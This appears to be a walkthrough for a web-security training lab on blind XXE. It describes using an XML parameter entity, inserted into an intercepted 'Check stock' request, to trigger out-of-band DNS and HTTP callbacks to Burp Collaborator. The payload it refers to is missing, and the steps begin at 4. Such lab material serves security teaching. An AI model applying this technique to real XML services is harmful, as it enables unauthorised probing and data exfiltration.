11.4 Lab: Blind XXE with out-of-band interaction via XML parameter entities | 2024

This lab has a “Check stock” feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

Visit a product page, click “Check stock” and intercept the resulting POST request in Burp Suite.Insert the following external entity definition in between the XML declaration and the stockCheck element.Right-click and select “Insert Collaborator payload” to insert a Burp Collaborator subdomain where indicated:

4. Go to the Collaborator tab, and click “Poll now”. If you don’t see any interactions listed, wait a few seconds and try again.

5. You should see some DNS and HTTP interactions that were initiated by the application as a result of your payload. Then the Lab will be solved.